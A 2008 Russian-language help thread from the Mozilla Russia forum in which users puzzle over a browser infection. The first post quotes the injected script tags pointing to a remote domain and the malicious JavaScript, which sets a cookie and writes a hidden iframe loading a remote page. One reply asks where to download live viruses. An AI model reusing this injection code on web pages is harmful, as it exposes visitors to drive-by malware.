Полезная информация
Страницы: 1
- Форумы
- » Программы и ОС
- » подцепил какую-то заразу
№116-11-2008 02:43:26
подцепил какую-то заразу
Это какойто Браузерный ЕКСПЛОЙТ.
появляется на разных страничках постоянно
<script language="javascript" SRC="http://do.qwertyy.cn/do.js"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/do.htm"></script>
<script language="javascript" SRC="http://do.qwertyy.cn/gg.htm"></script>
вот такая фигня. NOD32 в системе ничего не находит. Только когда эта байда запускается, вставляется в страничку браузера (Firefox 3.0.3)
нод начинает ругатся.
в Opera покамись незаметил эту штуку.
внутри файла лежит вот такой код:
document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://do.qwertyy.cn/do.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")
Эта штука живёт в кукисах - тобиш чистите куки
Открываем кукисы браузера и чистим все с названием Cookie1
Нашол вроде откуда лезит эта фигня. Ко мне на комп она попадает через БАННЕРЫ. после чистки кукисов первая зловредная кука с адресом banner.kiev.ua
Заражаюсь сразуже кактолько захожу фаерфоксом на какойто сайт с банерами УБС. Далее если кука висит она автоматом запускается если открываеш какойнибудь другой сайт.
Избавится от банеров сложно - сделовательно ждём обновлений фаерфокса... Кстате в Firefox версии 3,0,4 эта дыра присуцтвует.
Отсутствует
№216-11-2008 06:24:34
- fredperry
- Группа: Guest
- UA:
3.0
Re: подцепил какую-то заразу
чищу кукисы и ничего не происходит.
всё так же лезет qwertyy
№316-11-2008 08:52:21
- ZohaN
- Группа: Guest
- UA:
0.0
Re: подцепил какую-то заразу
у меня небыло такого.. пока 
№516-11-2008 10:25:12
- Const2008
- Группа: Guest
- UA:
6.0
Re: подцепил какую-то заразу
Засада!
Он и оперу и мозилу попал у меня.
Мозила как то предохраняеться, путем блокировки страницы, а опера тупо грузит его.
Короче только explorer пока в живых остался.
Кукисы и там и там почистил, кэш также очистел. Непомогает 
Что делать, кто знает?
№716-11-2008 10:39:50
- sks23
- Группа: Guest
- UA:
0.4
Re: подцепил какую-то заразу
Это ARP spoofing.
http://fahryhadikusumo.wordpress.com/tag/arp-spoofing-solution/
http://forum.kaspersky.com/index.php?showtopic=58061&st=60
http://forum.kaspersky.com/index.php?showtopic=87668&st=60&start=60
№916-11-2008 11:45:47
- Vet0489
- Группа: Guest
- UA: 7.0
Re: подцепил какую-то заразу
народ....тоже самое.....сначала подхвотил вот эту фигню.... точнее зашел случайно на нее когда чрез эксплорер лазел пришлось винду пеерставить......переставил поставил avast и теперь заходя на сайт любой выскакивает окошко от avast о том что он заблакикровал соединение с этим сайтом.....кто нибудь знает что делать то ?
№1016-11-2008 14:32:51
- lump
- Группа: Guest
- UA: 3.0
Re: подцепил какую-то заразу
а кто нить знает где можно закачать архивчик со свежими и опасными тараканами? гугль находит только DOSовское старьё. всёравно скоро винду сносить, апгрейд мамы-проца-оперативки
№1216-11-2008 18:37:17
- George Yves
- Help you I can
- Группа: Extensions
- Откуда: Полоцк, Беларусь
- Зарегистрирован: 22-05-2008
- Сообщений: 1886
- UA: 3.0
Re: подцепил какую-то заразу
в этом скрипте нет никакого эксплоита, он просто ворует куки.
А что говорит ваш антишпион, уважаемый Dragooon?
May the FOSS be with you!
Отсутствует
№1316-11-2008 18:40:32
Re: подцепил какую-то заразу
George Yves - молчит он. на кампе заразы явно нету. Заражен какой то компьютер в сети (баннерная сеть) и между например двумя ПК появляется некий зараженный посредник который модифицирует трафик добавляя в код который записывает куку в браузер после чего кука вставляет ифрейм.
Проблему нужно искать в сети. Думаю этот прикол не скоро найдут.
Shutnik - в данном коде эксплоита нету. Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox? ведь в опере у меня эта байда не вылазит и кука не пишется!
появляется на ресурсах где есть баннера
banner[dot]kiev[dot]ua
gala[dot]net
Отредактировано Dragooon (16-11-2008 18:49:00)
Отсутствует
№1417-11-2008 06:19:50
Re: подцепил какую-то заразу
Dragooon, а не проще ли адблоком вырезать эти баннеры нафиг?
P.S. выражаю сочувствие по поводу заразы и все такое...
Отредактировано Erik (17-11-2008 06:20:18)
Отсутствует
№1517-11-2008 14:52:39
Re: подцепил какую-то заразу
Но тогда КАКИМ образом експлоит попадает на комп через браузер Firefox?
он уже давно попал в него. рекомендую для начала попробовать новый профиль и перестановку браузера
Отсутствует
Страницы: 1
- Форумы
- » Программы и ОС
- » подцепил какую-то заразу
Board footer
Powered by PunBB
Modified by Mozilla Russia
Copyright © 2004–2020 Mozilla Russia 
Язык отображения форума: [Русский] [English]